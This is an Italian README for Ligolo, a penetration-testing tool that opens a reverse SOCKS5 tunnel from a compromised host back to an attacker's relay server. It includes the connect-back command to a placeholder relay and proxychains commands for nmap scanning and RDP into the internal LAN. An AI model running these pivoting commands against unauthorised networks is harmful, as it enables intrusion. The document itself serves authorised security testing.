
Reverse Tunneling reso facile per pentester, da pentester https://sysdream.com/

Ligolo è uno strumento semplice e leggero per stabilire tunnel SOCKS5 o TCP da una connessione inversa in completa sicurezza (certificato TLS con curva ellittica).
È paragonabile a Meterpreter con Autoroute + Socks4a, ma più stabile e veloce.
Hai compromesso un server Windows / Linux / Mac durante il tuo audit esterno. Questo server si trova all'interno di una rete LAN e vuoi stabilire connessioni ad altre macchine su questa rete.
Ligolo può configurare un tunnel per accedere alle risorse del server interno.
Relay di una connessione RDP utilizzando Proxychains (WAN).

Ecco uno screenshot di un speedtest tra due host a 100mb/s (ligolo / localrelay). Le prestazioni possono variare a seconda della configurazione di sistema e rete.

Assicurati che Go sia installato e funzionante.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
NOTA: Puoi anche usare i tuoi certificati utilizzando l'opzione TLS_CERT del make quando chiami build. Esempio: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo consiste di due moduli:
Localrelay è destinato ad essere lanciato sul server di controllo (il server attaccante).
Ligolo è il programma da eseguire sul computer target.
Per localrelay, puoi lasciare le opzioni predefinite. Ascolterà su ogni interfaccia sulla porta 5555 e aspetterà connessioni da ligolo (parametro -relayserver).
Per ligolo, devi specificare l'indirizzo IP del relay server (o del tuo server di attacco) utilizzando il parametro -relayserver ip:porta.
Puoi usare l'opzione -h per l'aiuto.
Una volta stabilita la connessione tra Ligolo e LocalRelay, un proxy SOCKS5 verrà configurato sulla porta TCP 1080 sul relay server (puoi cambiare l'indirizzo/porta TCP usando l'opzione -localserver).
Dopodiché, tutto ciò che devi fare è usare il tuo strumento preferito (Proxychains per esempio) ed esplorare la rete LAN del client.
Sul tuo server di attacco.
./bin/localrelay_linux_amd64
Sull'host compromesso.
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
Una volta stabilita la connessione, imposta i seguenti parametri nel file di configurazione di ProxyChains (sul server di attacco):
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Approfittane.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Opzioni di Localrelay:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Opzioni di Ligolo:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU General Public License v3.0 (Vedi LICENSING).